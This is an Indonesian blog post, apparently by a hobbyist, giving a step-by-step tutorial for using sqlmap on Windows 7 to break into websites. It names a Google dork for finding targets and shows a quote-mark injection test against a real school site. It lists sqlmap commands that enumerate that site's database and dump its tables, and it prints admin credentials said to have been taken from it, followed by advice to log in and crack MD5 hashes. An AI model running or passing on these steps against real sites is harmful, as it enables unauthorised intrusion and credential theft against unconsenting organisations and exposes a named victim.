Assalamualaikum Wr. Wb
kali ini saya mau share tutorial sqlmap di win7
Bahan :
- SQLMap Download -Click Here
- Python27 Download -Click Here
- Dork : inurl:/.php?*id=
[+] LANGKAHNYA MBAH BRO [+]
Untuk mengetahui website yang kalian mau Inject itu Vuln atau tidak , silahkan kasih tanda ( ' ) di akhir url target, contoh :
http://smkakp.sch.id/readmore.php?idreadmore=139 saya tambahin ' menjadi
http://smkakp.sch.id/readmore.php?idreadmore=139'
nah kalo vuln nanti ada tulisan "you have an error ...." mysql error dan sebagainya"
sekarang waktunya di hajar kalo udah ketemu web yang vuln :P
1. Setelah instal python, sekarang kalian extrack SQLMAPnya di Drive C:, setelah di extrack buka CMD lalu ketikan :
- cd\sqlmap\ , maka hasilnya akan seperti ini :
2. Stelah itu, kalian mulailah scan website target dengan perintah :
- sqlmap.py -u http://www.BUGWEBTARGET.com --dbs
3. Tuh kan keliatan DATABASE nya :D , sekarang waktunya kita scan dengan perintah :
Contoh Target : sqlmap.py -u http://smkakp.sch.id/readmore.php?idreadmore=139 -D smkakpsc_gums --tables , maka hasilnya akan seperti ini :
4.Nah keliatan kan Table di databasenya ? nah sekarang kita scan table tersebut (cari yang menurut kalian terdapat info tentang user dan pass website) kalo udah yakin disana ada infonya, ketikan perintah :
- sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns
5. Nah setelah keliatan Tabelnya sekarang kita ketikan perintah :
- sqlmap.py -u http://www.target.com -D nama_database -T nama_table --dump
Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip" :
- do you want to crack them via a dictionary-based attack? [Y/n/q]
Nah kita udah dapet tuh user sama passnya :D
user : rahasia2014
pass : webdaritommy
Sekarang tinggal login ke admin
kalau dapet password aneh segera di pecahin itu md5nya caranya pergi ke :
Dah ya sekian dulu postingan saya, ane lagi males ngetik :D
sama kan kaya make backtrack 5 atau linux :D
semoga berhasiL
NB:JANGAN DI SALAH GUNAKAN
0 comments:
Post a Comment